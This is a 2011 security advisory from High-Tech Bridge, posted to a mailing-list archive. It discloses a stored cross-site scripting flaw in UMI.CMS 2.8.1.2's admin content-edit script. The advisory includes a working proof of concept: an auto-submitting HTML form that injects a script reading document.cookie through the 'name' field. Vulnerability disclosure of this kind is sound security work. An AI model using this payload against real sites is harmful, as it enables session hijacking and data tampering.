[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

HTB22811: XSS vulnerability in UMI.CMS



Vulnerability ID: HTB22811
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_umi_cms.html
Product: UMI.CMS
Vendor: umisoft ( http://www.umi-cms.ru/ ) 
Vulnerable Version: 2.8.1.2
Vendor Notification: 25 January 2011 
Vulnerability Type: Stored XSS (Cross Site Scripting)
Risk level: Low 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) 

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the "/admin/content/edit/PAGEID/do/" script to properly sanitize user-supplied input in "name" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is available:

<form action="http://[host]/admin/content/edit/PAGEID/do/"; method="post" name="main" enctype="multipart/form-data" >

<input type="hidden" name="referer" value="google">
<input type="hidden" name="domain" value="[host]">
<input type="hidden" name="name" value='price3"><script>alert(document.cookie)</script>'>
<input type="hidden" name="alt-name" value="price">
<input type="hidden" name="active" value="0">
<input type="hidden" name="active" value="1">
<input type="hidden" name="type-id" value="10">
<input type="hidden" name="save-mode" value="Save">
<input type="hidden" name="template-id" value="2">
<input type="hidden" name="is-visible" value="0">
<input type="hidden" name="is-visible" value="1">
<input type="hidden" name="is-default" value="0">

</form>
<script>
document.main.submit();
</script>